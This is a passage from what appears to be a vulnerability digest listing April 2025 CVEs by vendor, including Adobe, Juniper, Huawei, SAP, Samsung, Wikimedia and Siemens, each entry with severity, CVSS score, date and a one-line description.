CVE-2025-30288 | High | 8.2 | — | 2025-04-08 | ColdFusion versions 2023.12, 2021.18, 2025.0 and earlier are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. |
CVE-2025-30287 | High | 8.2 | — | 2025-04-08 | ColdFusion versions 2023.12, 2021.18, 2025.0 and earlier are affected by an Improper Authentication vulnerability that could result in arbitrary code execution in the context of the current user. |
CVE-2025-30294 | Medium | 6.8 | — | 2025-04-08 | ColdFusion versions 2023.12, 2021.18, 2025.0 and earlier are affected by an Improper Input Validation vulnerability that could result in a security feature bypass. |
CVE-2025-30293 | Medium | 6.8 | — | 2025-04-08 | ColdFusion versions 2023.12, 2021.18, 2025.0 and earlier are affected by an Improper Input Validation vulnerability that could result in a security feature bypass. |
CVE-2025-30292 | Medium | 6.1 | — | 2025-04-08 | ColdFusion versions 2023.12, 2021.18, 2025.0 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. |
CVE-2025-30291 | Medium | 5.5 | — | 2025-04-08 | ColdFusion versions 2023.12, 2021.18, 2025.0 and earlier are affected by an Information Exposure vulnerability that could result in a security feature bypass. |
CVE-2025-30309 | Medium | 5.5 | — | 2025-04-08 | XMP Toolkit versions 2023.12 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. |
CVE-2025-30308 | Medium | 5.5 | — | 2025-04-08 | XMP Toolkit versions 2023.12 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. |
CVE-2025-30307 | Medium | 5.5 | — | 2025-04-08 | XMP Toolkit versions 2023.12 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. |
CVE-2025-30306 | Medium | 5.5 | — | 2025-04-08 | XMP Toolkit versions 2023.12 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. |
CVE-2025-30305 | Medium | 5.5 | — | 2025-04-08 | XMP Toolkit versions 2023.12 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. |
CVE-2025-27205 | Medium | 5.4 | — | 2025-04-08 | Adobe Experience Manager Screens versions FP11.3 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. |
CVE-2025-27191 | Medium | 5.3 | — | 2025-04-08 | Adobe Commerce versions 2.4.7-p4, 2.4.6-p9, 2.4.5-p11, 2.4.4-p12, 2.4.8-beta2 and earlier are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. |
CVE-2025-27190 | Medium | 5.3 | — | 2025-04-08 | Adobe Commerce versions 2.4.7-p4, 2.4.6-p9, 2.4.5-p11, 2.4.4-p12, 2.4.8-beta2 and earlier are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. |
CVE-2025-27189 | Medium | 4.3 | — | 2025-04-08 | Adobe Commerce versions 2.4.7-p4, 2.4.6-p9, 2.4.5-p11, 2.4.4-p12, 2.4.8-beta2 and earlier are affected by a Cross-Site Request Forgery (CSRF) vulnerability that could be exploited to cause a denial-of-service condition. |
CVE-2025-27188 | Medium | 4.3 | — | 2025-04-08 | Adobe Commerce versions 2.4.7-p4, 2.4.6-p9, 2.4.5-p11, 2.4.4-p12, 2.4.8-beta2 and earlier are affected by an Improper Authorization vulnerability that could result in Privilege escalation. |
CVE-2025-27192 | Low | 2.7 | — | 2025-04-08 | Adobe Commerce versions 2.4.7-p4, 2.4.6-p9, 2.4.5-p11, 2.4.4-p12, 2.4.8-beta2 and earlier are affected by an Insufficiently Protected Credentials vulnerability that could lead to a security feature bypass. |
N/a (no vendor recorded) · 22 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2024-55210 | Critical | 9.8 | — | 2025-04-09 | An issue in TOTVS Framework (Linha Protheus) 12.1.2310 allows attackers to bypass multi-factor authentication (MFA) via a crafted websocket message. |
CVE-2025-28413 | Critical | 9.8 | — | 2025-04-07 | An issue in RUoYi v.4.8.0 allows a remote attacker to escalate privileges via the SysDictTypeController component |
CVE-2025-28412 | Critical | 9.8 | — | 2025-04-07 | An issue in RUoYi v.4.8.0 allows a remote attacker to escalate privileges via the /editSave method in SysNoticeController |
CVE-2025-28411 | Critical | 9.8 | — | 2025-04-07 | An issue in RUoYi v.4.8.0 allows a remote attacker to escalate privileges via the editSave method in /tool/gen/editSave |
CVE-2025-28410 | Critical | 9.8 | — | 2025-04-07 | An issue in RUoYi v.4.8.0 allows a remote attacker to escalate privileges via the cancelAuthUserAll method, which does not properly validate whether the requesting user has administrative privileges |
CVE-2025-28408 | Critical | 9.8 | — | 2025-04-07 | An issue in RUoYi v.4.8.0 allows a remote attacker to escalate privileges via the selectDeptTree method of the /selectDeptTree/{deptId} endpoint, which does not properly validate the deptId parameter |
CVE-2025-28406 | Critical | 9.8 | — | 2025-04-07 | An issue in RUoYi v.4.8.0 allows a remote attacker to escalate privileges via the jobLogId parameter |
CVE-2025-28405 | Critical | 9.8 | — | 2025-04-07 | An issue in RUoYi v.4.8.0 allows a remote attacker to escalate privileges via the changeStatus method |
CVE-2025-28402 | Critical | 9.8 | — | 2025-04-07 | An issue in RUoYi v.4.8.0 allows a remote attacker to escalate privileges via the jobId parameter |
CVE-2025-28409 | High | 8.8 | — | 2025-04-07 | An issue in RUoYi v.4.8.0 allows a remote attacker to escalate privileges via the add method of the /add/{parentId} endpoint, which does not properly validate whether the requesting user has permission to add a menu item under the specified paren… |
CVE-2025-28407 | High | 8.8 | — | 2025-04-07 | An issue in RUoYi v.4.8.0 allows a remote attacker to escalate privileges via the edit method of the /edit/{dictId} endpoint, which does not properly validate whether the requesting user has permission to modify the specified dictId |
CVE-2025-29394 | High | 8.1 | — | 2025-04-09 | An insecure permissions vulnerability in verydows v2.0 allows a remote attacker to execute arbitrary code by uploading a file type. |
CVE-2025-28403 | High | 7.2 | — | 2025-04-07 | An issue in RUoYi v.4.8.0 allows a remote attacker to escalate privileges via the editSave method, which does not properly validate whether the requesting user has administrative privileges before allowing modifications to system configuration se… |
CVE-2025-28401 | Medium | 6.7 | — | 2025-04-07 | An issue in RUoYi v.4.8.0 allows a remote attacker to escalate privileges via the menuId parameter |
CVE-2025-28400 | Medium | 6.7 | — | 2025-04-07 | An issue in RUoYi v.4.8.0 allows a remote attacker to escalate privileges via the postID parameter in the edit method |
CVE-2025-29482 | Medium | 6.2 | — | 2025-04-07 | Buffer Overflow vulnerability in libheif 1.19.7 allows a local attacker to execute arbitrary code via the SAO (Sample Adaptive Offset) processing of libde265. |
CVE-2025-29389 | Medium | 6.1 | — | 2025-04-09 | PbootCMS v3.2.9 contains a XSS vulnerability in admin.php?p=/Content/index/mcode/2#tab=t2. |
CVE-2025-29594 | Medium | 6.1 | — | 2025-04-07 | A vulnerability exists in the errorpage.php file of the CS2-WeaponPaints-Website v2.1.7 where user-controlled input is not adequately validated before being processed. |
CVE-2025-29480 | Medium | 5.5 | — | 2025-04-07 | Buffer Overflow vulnerability in gdal 3.10.2 allows a local attacker to cause a denial of service via the OGRSpatialReference::Release function. |
CVE-2025-29478 | Medium | 5.5 | — | 2025-04-07 | An issue in fluent-bit v.3.7.2 allows a local attacker to cause a denial of service via the cfl_list_size in cfl_list.h:165. |
CVE-2024-46494 | Medium | 5.4 | — | 2025-04-07 | A cross-site scripting (XSS) vulnerability in Typecho v1.2.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into Name parameter under a comment for an Article. |
CVE-2025-3397 | Medium | 4.3 | — | 2025-04-08 | A vulnerability classified as problematic has been found in YzmCMS 7.1. |
Juniper · 21 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-30660 | High | 7.5 | — | 2025-04-09 | An Improper Check for Unusual or Exceptional Conditions vulnerability in the Packet Forwarding Engine (pfe) of Juniper Networks Junos OS on MX Series allows an unauthenticated, network-based attacker to cause a Denial-of-Service (DoS). When… |
CVE-2025-30659 | High | 7.5 | — | 2025-04-09 | An Improper Handling of Length Parameter Inconsistency vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS on SRX Series allows an unauthenticated, network-based attacker to cause a Denial-of-Service (DoS). |
CVE-2025-30658 | High | 7.5 | — | 2025-04-09 | A Missing Release of Memory after Effective Lifetime vulnerability in the Anti-Virus processing of Juniper Networks Junos OS on SRX Series allows an unauthenticated, network-based attacker to cause a Denial-of-Service (DoS). |
CVE-2025-30656 | High | 7.5 | — | 2025-04-09 | An Improper Handling of Additional Special Element vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS on MX Series with MS-MPC, MS-MIC and SPC3, and SRX Series, allows an unauthenticated, network-based attacke… |
CVE-2025-30651 | High | 7.5 | — | 2025-04-09 | A Buffer Access with Incorrect Length Value vulnerability in the routing protocol daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, network-based attacker to cause a Denial of Service (DoS). |
CVE-2025-30649 | High | 7.5 | — | 2025-04-09 | An Improper Input Validation vulnerability in the syslog stream TCP transport of Juniper Networks Junos OS on MX240, MX480 and MX960 devices with MX-SPC3 Security Services Card allows an unauthenticated, network-based attacker to send spe… |
CVE-2025-30645 | High | 7.5 | — | 2025-04-09 | A NULL Pointer Dereference vulnerability in the flow daemon (flowd) of Juniper Networks Junos OS on SRX Series allows an attacker causing specific, valid control traffic to be sent out of a Dual-Stack (DS) Lite tunnel to crash the flowd pr… |
CVE-2025-30644 | High | 7.5 | — | 2025-04-09 | A Heap-based Buffer Overflow vulnerability in the flexible PIC concentrator (FPC) of Juniper Networks Junos OS on EX2300, EX3400, EX4100, EX4300, EX4300MP, EX4400, EX4600, EX4650-48Y, and QFX5k Series allows an attacker to send a specific… |
CVE-2025-21601 | High | 7.5 | — | 2025-04-09 | An Improper Following of Specification by Caller vulnerability in web management (J-Web, Captive Portal, 802.1X, Juniper Secure Connect (JSC) of Juniper Networks Junos OS on SRX Series, EX Series, MX240, MX480, MX960, QFX5120 Series, allow… |
CVE-2025-21594 | High | 7.5 | — | 2025-04-09 | An Improper Check for Unusual or Exceptional Conditions vulnerability in the pfe (packet forwarding engine) of Juniper Networks Junos OS on MX Series causes a port within a pool to be blocked leading to Denial of Service (DoS). |
CVE-2025-30648 | High | 7.4 | — | 2025-04-09 | An Improper Input Validation vulnerability in the Juniper DHCP Daemon (jdhcpd) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, adjacent attacker to cause the jdhcpd process to crash resulting in a Denial of Ser… |
CVE-2025-21591 | High | 7.4 | — | 2025-04-09 | A Buffer Access with Incorrect Length Value vulnerability in the jdhcpd daemon of Juniper Networks Junos OS, when DHCP snooping is enabled, allows an unauthenticated, adjacent, attacker to send a DHCP packet with a malformed DHCP option to… |
CVE-2025-30653 | Medium | 6.5 | — | 2025-04-09 | An Expired Pointer Dereference vulnerability in Routing Protocol Daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, adjacent attacker to cause Denial of Service (DoS). On all Junos OS and Junos OS Evol… |
CVE-2025-30647 | Medium | 6.5 | — | 2025-04-09 | A Missing Release of Memory after Effective Lifetime vulnerability in the packet forwarding engine (PFE) of Juniper Networks Junos OS on MX Series allows an unauthenticated adjacent attacker to cause a Denial-of-Service (DoS). |
CVE-2025-30646 | Medium | 6.5 | — | 2025-04-09 | A Signed to Unsigned Conversion Error vulnerability in the Layer 2 Control Protocol daemon (l2cpd) of Juniper Networks Junos OS and Juniper Networks Junos OS Evolved allows an unauthenticated adjacent attacker sending a specifically malfor… |
CVE-2025-21595 | Medium | 6.5 | — | 2025-04-09 | A Missing Release of Memory after Effective Lifetime vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS and Junos OS Evolved allows an adjacent, unauthenticated attacker to cause an FPC to crash, leading to De… |
CVE-2025-30655 | Medium | 5.5 | — | 2025-04-09 | An Improper Check for Unusual or Exceptional Conditions vulnerability in the Routing Protocol Daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows a local, low-privileged attacker to cause a Denial-of-Service (DoS). |
CVE-2025-30654 | Medium | 5.5 | — | 2025-04-09 | An Exposure of Sensitive Information to an Unauthorized Actor vulnerability in the User Interface (UI) of Juniper Networks Junos OS and Junos OS Evolved allows a local, low-privileged, authenticated attacker with access to the CLI to acces… |
CVE-2025-30652 | Medium | 5.5 | — | 2025-04-09 | An Improper Handling of Exceptional Conditions vulnerability in routing protocol daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows a local, low-privileged attacker executing a CLI command to cause a Denial of Service (D… |
CVE-2025-30657 | Medium | 5.3 | — | 2025-04-09 | An Improper Encoding or Escaping of Output vulnerability in the Sampling Route Record Daemon (SRRD) of Juniper Networks Junos OS allows an unauthenticated, network-based attacker to cause a Denial-of-Service (DoS). |
CVE-2025-21597 | Medium | 5.3 | — | 2025-04-09 | An Improper Check for Unusual or Exceptional Conditions vulnerability in routing protocol daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, logically adjacent BGP peer to cause Denial of Service (DoS… |
Huawei · 20 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31173 | High | 8.8 | — | 2025-04-07 | Memory write permission bypass vulnerability in the kernel futex module. Impact: Successful exploitation of this vulnerability may affect service confidentiality. |
CVE-2025-31175 | High | 8.4 | — | 2025-04-07 | Deserialization mismatch vulnerability in the DSoftBus module. Impact: Successful exploitation of this vulnerability may affect service integrity. |
CVE-2025-31170 | High | 8.4 | — | 2025-04-07 | Access control vulnerability in the security verification module. Impact: Successful exploitation of this vulnerability will affect integrity and confidentiality. |
CVE-2024-58127 | High | 8.4 | — | 2025-04-07 | Access control vulnerability in the security verification module. Impact: Successful exploitation of this vulnerability will affect integrity and confidentiality. |
CVE-2024-58126 | High | 8.4 | — | 2025-04-07 | Access control vulnerability in the security verification module. Impact: Successful exploitation of this vulnerability will affect integrity and confidentiality. |
CVE-2024-58125 | High | 8.4 | — | 2025-04-07 | Access control vulnerability in the security verification module. Impact: Successful exploitation of this vulnerability will affect integrity and confidentiality. |
CVE-2024-58124 | High | 8.4 | — | 2025-04-07 | Access control vulnerability in the security verification module. Impact: Successful exploitation of this vulnerability will affect integrity and confidentiality. |
CVE-2025-31172 | High | 7.8 | — | 2025-04-07 | Memory write permission bypass vulnerability in the kernel futex module. Impact: Successful exploitation of this vulnerability may affect service confidentiality. |
CVE-2024-58112 | High | 7.5 | — | 2025-04-07 | Exception capture failure vulnerability in the SVG parsing module of the ArkUI framework. Impact: Successful exploitation of this vulnerability may affect availability. |
CVE-2024-58111 | High | 7.5 | — | 2025-04-07 | Exception capture failure vulnerability in the SVG parsing module of the ArkUI framework. Impact: Successful exploitation of this vulnerability may affect availability. |
CVE-2024-58107 | High | 7.5 | — | 2025-04-07 | Buffer overflow vulnerability in the codec module. Impact: Successful exploitation of this vulnerability may affect availability. |
CVE-2025-31174 | Medium | 6.8 | — | 2025-04-07 | Path traversal vulnerability in the DFS module. Impact: Successful exploitation of this vulnerability may affect service confidentiality. |
CVE-2025-31171 | Medium | 6.8 | — | 2025-04-07 | File read permission bypass vulnerability in the kernel file system module. Impact: Successful exploitation of this vulnerability may affect service confidentiality. |
CVE-2024-58113 | Medium | 5.3 | — | 2025-04-07 | Vulnerability of improper resource management in the memory management module. Impact: Successful exploitation of this vulnerability may affect availability. |
CVE-2024-58110 | Medium | 4.6 | — | 2025-04-07 | Buffer overflow vulnerability in the codec module. Impact: Successful exploitation of this vulnerability may affect availability. |
CVE-2024-58109 | Medium | 4.6 | — | 2025-04-07 | Buffer overflow vulnerability in the codec module. Impact: Successful exploitation of this vulnerability may affect availability. |
CVE-2024-58108 | Medium | 4.6 | — | 2025-04-07 | Buffer overflow vulnerability in the codec module. Impact: Successful exploitation of this vulnerability may affect availability. |
CVE-2024-58106 | Medium | 4.6 | — | 2025-04-07 | Buffer overflow vulnerability in the codec module. Impact: Successful exploitation of this vulnerability may affect availability. |
CVE-2024-58116 | Medium | 4.0 | — | 2025-04-07 | Buffer overflow vulnerability in the SVG parsing module of the ArkUI framework. Impact: Successful exploitation of this vulnerability may affect availability. |
CVE-2024-58115 | Medium | 4.0 | — | 2025-04-07 | Buffer overflow vulnerability in the SVG parsing module of the ArkUI framework. Impact: Successful exploitation of this vulnerability may affect availability. |
SAP SE · 16 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31330 | Critical | 9.9 | — | 2025-04-08 | SAP Landscape Transformation (SLT) allows an attacker with user privileges to exploit a vulnerability in the function module exposed via RFC. |
CVE-2025-27429 | Critical | 9.9 | — | 2025-04-08 | SAP S/4HANA allows an attacker with user privileges to exploit a vulnerability in the function module exposed via RFC. |
CVE-2025-30016 | Critical | 9.8 | — | 2025-04-08 | SAP Financial Consolidation allows an unauthenticated attacker to gain unauthorized access to the Admin account. |
CVE-2025-23186 | High | 8.5 | — | 2025-04-08 | In certain conditions, SAP NetWeaver Application Server ABAP allows an authenticated attacker to craft a Remote Function Call (RFC) request to restricted destinations, which can be used to expose credentials for a remote service. |
CVE-2025-30014 | High | 7.7 | — | 2025-04-08 | SAP Capital Yield Tax Management has directory traversal vulnerability due to insufficient path validation. |
CVE-2025-27428 | High | 7.7 | — | 2025-04-08 | Due to directory traversal vulnerability, an authorized attacker could gain access to some critical information by using RFC enabled function module. |
CVE-2025-26654 | Medium | 6.8 | — | 2025-04-08 | SAP Commerce Cloud (Public Cloud) does not allow unencrypted HTTP (port 80) to be disabled entirely; it only allows a redirect from port 80 to 443 (HTTPS). |
CVE-2025-30013 | Medium | 6.7 | — | 2025-04-08 | SAP ERP BW Business Content is vulnerable to OS Command Injection through certain function modules. |
CVE-2025-26657 | Medium | 5.3 | — | 2025-04-08 | SAP KMC WPC allows an unauthenticated attacker to remotely retrieve usernames by a simple parameter query which could expose sensitive information causing low impact on confidentiality of the application. |
CVE-2025-26653 | Medium | 4.7 | — | 2025-04-08 | SAP NetWeaver Application Server ABAP does not sufficiently encode user-controlled inputs, leading to Stored Cross-Site Scripting (XSS) vulnerability. |
CVE-2025-30017 | Medium | 4.4 | — | 2025-04-08 | Due to a missing authorization check, an authenticated attacker could upload a file as a template for solution documentation in SAP Solution Manager 7.1. |
CVE-2025-31333 | Medium | 4.3 | — | 2025-04-08 | SAP S4CORE OData meta-data property is vulnerable to data tampering, due to which entity set could be externally modified by an attacker causing low impact on integrity of the application. |
CVE-2025-31331 | Medium | 4.3 | — | 2025-04-08 | SAP NetWeaver allows an attacker to bypass authorization checks, enabling them to view portions of ABAP code that would normally require additional validation. |
CVE-2025-27437 | Medium | 4.3 | — | 2025-04-08 | A Missing Authorization Check vulnerability exists in the Virus Scanner Interface of SAP NetWeaver Application Server ABAP. |
CVE-2025-27435 | Medium | 4.2 | — | 2025-04-08 | Under specific conditions and prerequisites, an unauthenticated attacker could access customer coupon codes exposed in the URL parameters of the Coupon Campaign URL in SAP Commerce. |
CVE-2025-30015 | Medium | 4.1 | — | 2025-04-08 | Due to incorrect memory address handling in ABAP SQL of SAP NetWeaver and ABAP Platform (Application Server ABAP), an authenticated attacker with high privileges could execute certain forms of SQL queries leading to manipulation of content… |
Code-projects · 15 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3345 | High | 7.3 | — | 2025-04-07 | A vulnerability was found in codeprojects Online Restaurant Management System 1.0. |
CVE-2025-3344 | High | 7.3 | — | 2025-04-07 | A vulnerability was found in codeprojects Online Restaurant Management System 1.0. |
CVE-2025-3343 | High | 7.3 | — | 2025-04-07 | A vulnerability was found in codeprojects Online Restaurant Management System 1.0 and classified as critical. |
CVE-2025-3342 | High | 7.3 | — | 2025-04-07 | A vulnerability has been found in codeprojects Online Restaurant Management System 1.0 and classified as critical. |
CVE-2025-3341 | High | 7.3 | — | 2025-04-07 | A vulnerability, which was classified as critical, was found in codeprojects Online Restaurant Management System 1.0. |
CVE-2025-3340 | High | 7.3 | — | 2025-04-07 | A vulnerability, which was classified as critical, has been found in codeprojects Online Restaurant Management System 1.0. |
CVE-2025-3339 | High | 7.3 | — | 2025-04-07 | A vulnerability classified as critical was found in codeprojects Online Restaurant Management System 1.0. |
CVE-2025-3338 | High | 7.3 | — | 2025-04-07 | A vulnerability classified as critical has been found in codeprojects Online Restaurant Management System 1.0. |
CVE-2025-3334 | High | 7.3 | — | 2025-04-07 | A vulnerability was found in codeprojects Online Restaurant Management System 1.0 and classified as critical. |
CVE-2025-3333 | High | 7.3 | — | 2025-04-07 | A vulnerability has been found in codeprojects Online Restaurant Management System 1.0 and classified as critical. |
CVE-2025-3332 | High | 7.3 | — | 2025-04-07 | A vulnerability, which was classified as critical, was found in codeprojects Online Restaurant Management System 1.0. |
CVE-2025-3331 | High | 7.3 | — | 2025-04-07 | A vulnerability, which was classified as critical, has been found in codeprojects Online Restaurant Management System 1.0. |
CVE-2025-3330 | High | 7.3 | — | 2025-04-07 | A vulnerability classified as critical was found in codeprojects Online Restaurant Management System 1.0. |
CVE-2025-3348 | Medium | 6.3 | — | 2025-04-07 | A vulnerability classified as critical was found in code-projects Patient Record Management System 1.0. |
CVE-2025-3347 | Medium | 6.3 | — | 2025-04-07 | A vulnerability classified as critical has been found in code-projects Patient Record Management System 1.0. |
Samsung · 15 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-20946 | High | 8.8 | — | 2025-04-08 | Improper handling of exceptional conditions in pairing specific bluetooth devices in Galaxy Watch Bluetooth pairing prior to SMR Apr-2025 Release 1 allows local attackers to pair with specific bluetooth devices without user interaction. |
CVE-2025-20936 | High | 8.8 | — | 2025-04-08 | Improper access control in HDCP trustlet prior to SMR Apr-2025 Release 1 allows local attackers with shell privilege to escalate their privileges to root. |
CVE-2025-20943 | Medium | 6.4 | — | 2025-04-08 | Out-of-bounds write in secfr trustlet prior to SMR Apr-2025 Release 1 allows local privileged attackers to cause memory corruption. |
CVE-2025-20944 | Medium | 6.2 | — | 2025-04-08 | Out-of-bounds read in parsing audio data in libsavsac.so prior to SMR Apr-2025 Release 1 allows local attackers to read out-of-bounds memory. |
CVE-2025-20941 | Medium | 6.2 | — | 2025-04-08 | Improper access control in InputManager prior to SMR Apr-2025 Release 1 allows local attackers to access the scancode of specific input device. |
CVE-2025-20952 | Medium | 5.5 | — | 2025-04-09 | Improper access control in Mdecservice prior to SMR Apr-2025 Release 1 allows local attackers to access arbitrary files with system privilege. |
CVE-2025-20948 | Medium | 5.5 | — | 2025-04-08 | Out-of-bounds read in enrollment with cdsp frame secfr trustlet prior to SMR Apr-2025 Release 1 allows local privileged attackers to read out-of-bounds memory. |
CVE-2025-20947 | Medium | 5.5 | — | 2025-04-08 | Improper handling of insufficient permission or privileges in ClipboardService prior to SMR Apr-2025 Release 1 allows local attackers to access image files across multiple users. |
CVE-2025-20938 | Medium | 5.5 | — | 2025-04-08 | Improper access control in SamsungContacts prior to SMR Apr-2025 Release 1 allows local attackers to access protected data in SamsungContacts. |
CVE-2025-20934 | Medium | 5.5 | — | 2025-04-08 | Improper access control in Sticker Center prior to SMR Apr-2025 Release 1 allows local attackers to access image files with system privilege. |
CVE-2025-20939 | Medium | 5.4 | — | 2025-04-08 | Improper authorization in wireless download protocol in Galaxy Watch prior to SMR Apr-2025 Release 1 allows physical attackers to update the device's unique identifier on Watch devices. |
CVE-2025-20951 | Medium | 5.1 | — | 2025-04-08 | Improper verification of intent by broadcast receiver vulnerability in Galaxy Store prior to version 4.5.90.7 allows local attackers to write arbitrary files with the privilege of Galaxy Store. |
CVE-2025-20942 | Medium | 4.4 | — | 2025-04-08 | Improper Verification of Intent by Broadcast Receiver in DeviceIdService prior to SMR Apr-2025 Release 1 allows local attackers to reset OAID. |
CVE-2025-20950 | Medium | 4.0 | — | 2025-04-08 | Use of implicit intent for sensitive communication in SamsungNotes prior to version 4.4.26.45 allows local attackers to access sensitive information. |
CVE-2025-20945 | Medium | 4.0 | — | 2025-04-08 | Improper access control in Galaxy Watch prior to SMR Apr-2025 Release 1 allows local attackers to access sensitive information of Galaxy watch. |
The Wikimedia Foundation · 14 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32079 | Medium | 6.5 | — | 2025-04-11 | Improper Input Validation vulnerability in The Wikimedia Foundation Mediawiki - GrowthExperiments allows HTTP DoS. This issue affects Mediawiki - GrowthExperiments: from 1.39 through 1.43. |
CVE-2025-32074 | Medium | 5.4 | — | 2025-04-11 | Improper Encoding or Escaping of Output vulnerability in The Wikimedia Foundation Mediawiki - Confirm Account Extension allows Cross-Site Scripting (XSS). This issue affects Mediawiki - Confirm Account Extension: from 1.39 through 1.43. |
CVE-2025-32073 | Medium | 5.4 | — | 2025-04-11 | Improper Input Validation vulnerability in The Wikimedia Foundation Mediawiki - HTML Tags allows Cross-Site Scripting (XSS). This issue affects Mediawiki - HTML Tags: from 1.39 through 1.43. |
CVE-2025-32071 | Medium | 5.4 | — | 2025-04-11 | Improper Input Validation vulnerability in The Wikimedia Foundation Mediawiki - Wikidata Extension allows Cross-Site Scripting (XSS) from widthheight message via ImageHandler::getDimensionsString(). This issue affects Mediawiki - Wikidata Ex… |
CVE-2025-32070 | Medium | 5.4 | — | 2025-04-11 | Improper Input Validation vulnerability in The Wikimedia Foundation Mediawiki - AJAX Poll Extension allows Cross-Site Scripting (XSS). This issue affects Mediawiki - AJAX Poll Extension: from 1.39 through 1.43. |
CVE-2025-32069 | Medium | 5.4 | — | 2025-04-11 | Improper Input Validation vulnerability in The Wikimedia Foundation Mediawiki - Wikibase Media Info Extension allows Cross-Site Scripting (XSS). This issue affects Mediawiki - Wikibase Media Info Extension: from 1.39 through 1.43. |
CVE-2025-32068 | Medium | 5.4 | — | 2025-04-11 | Incorrect Authorization vulnerability in The Wikimedia Foundation Mediawiki - OAuth Extension allows Authentication Bypass. This issue affects Mediawiki - OAuth Extension: from 1.39 through 1.43. |
CVE-2025-32067 | Medium | 5.4 | — | 2025-04-11 | Improper Input Validation vulnerability in The Wikimedia Foundation Mediawiki - Growth Experiments Extension allows Cross-Site Scripting (XSS). This issue affects Mediawiki - Growth Experiments Extension: from 1.39 through 1.43. |
CVE-2025-32080 | — | — | — | 2025-04-11 | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in The Wikimedia Foundation Mediawiki - Mobile Frontend Extension allows Shared Resource Manipulation. This issue affects Mediawiki - Mobile Frontend Extension: from 1… |
CVE-2025-32078 | — | — | — | 2025-04-11 | Improper Encoding or Escaping of Output vulnerability in The Wikimedia Foundation Mediawiki - Version Compare Extension allows Cross-Site Scripting (XSS). This issue affects Mediawiki - Version Compare Extension: from 1.39 through 1.43. |
CVE-2025-32077 | — | — | — | 2025-04-11 | Improper Input Validation vulnerability in The Wikimedia Foundation Mediawiki - Extension:SimpleCalendar allows Cross-Site Scripting (XSS). This issue affects Mediawiki - Extension:SimpleCalendar: from 1.39 through 1.43. |
CVE-2025-32076 | — | — | — | 2025-04-11 | Improper Input Validation vulnerability in The Wikimedia Foundation Mediawiki - Visual Data Extension allows HTTP DoS. This issue affects Mediawiki - Visual Data Extension: from 1.39 through 1.43. |
CVE-2025-32075 | — | — | — | 2025-04-11 | Improper Input Validation vulnerability in The Wikimedia Foundation Mediawiki - Tabs Extension allows Code Injection. This issue affects Mediawiki - Tabs Extension: from 1.39 through 1.43. |
CVE-2025-32072 | — | — | — | 2025-04-11 | Improper Encoding or Escaping of Output vulnerability in The Wikimedia Foundation Mediawiki Core - Feed Utils allows WebView Injection. This issue affects Mediawiki Core - Feed Utils: from 1.39 through 1.43. |
Siemens · 13 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2024-41794 | Critical | 10.0 | — | 2025-04-08 | A vulnerability has been identified in SENTRON 7KT PAC1260 Data Manager (All versions). |
CVE-2024-54092 | Critical | 9.8 | — | 2025-04-08 | A vulnerability has been identified in Industrial Edge Device Kit - arm64 V1.17 (All versions), Industrial Edge Device Kit - arm64 V1.18 (All versions), Industrial Edge Device Kit - arm64 V1.19 (All versions), Industrial Edge Device Kit -… |
CVE-2024-41790 | Critical | 9.1 | — | 2025-04-08 | A vulnerability has been identified in SENTRON 7KT PAC1260 Data Manager (All versions). |
CVE-2024-41789 | Critical | 9.1 | — | 2025-04-08 | A vulnerability has been identified in SENTRON 7KT PAC1260 Data Manager (All versions). |
CVE-2024-41788 | Critical | 9.1 | — | 2025-04-08 | A vulnerability has been identified in SENTRON 7KT PAC1260 Data Manager (All versions). |
CVE-2024-41793 | High | 8.6 | — | 2025-04-08 | A vulnerability has been identified in SENTRON 7KT PAC1260 Data Manager (All versions). |
CVE-2024-41792 | High | 8.6 | — | 2025-04-08 | A vulnerability has been identified in SENTRON 7KT PAC1260 Data Manager (All versions). |
CVE-2024-41791 | High | 7.3 | — | 2025-04-08 | A vulnerability has been identified in SENTRON 7KT PAC1260 Data Manager (All versions). |
CVE-2025-30000 | Medium | 6.7 | — | 2025-04-08 | A vulnerability has been identified in Siemens License Server (SLS) (All versions < V4.3). |
CVE-2025-29999 | Medium | 6.7 | — | 2025-04-08 | A vulnerability has been identified in Siemens License Server (SLS) (All versions < V4.3). |
CVE-2024-41796 | Medium | 6.5 | — | 2025-04-08 | A vulnerability has been identified in SENTRON 7KT PAC1260 Data Manager (All versions). |
CVE-2024-41795 | Medium | 6.5 | — | 2025-04-08 | A vulnerability has been identified in SENTRON 7KT PAC1260 Data Manager (All versions). |
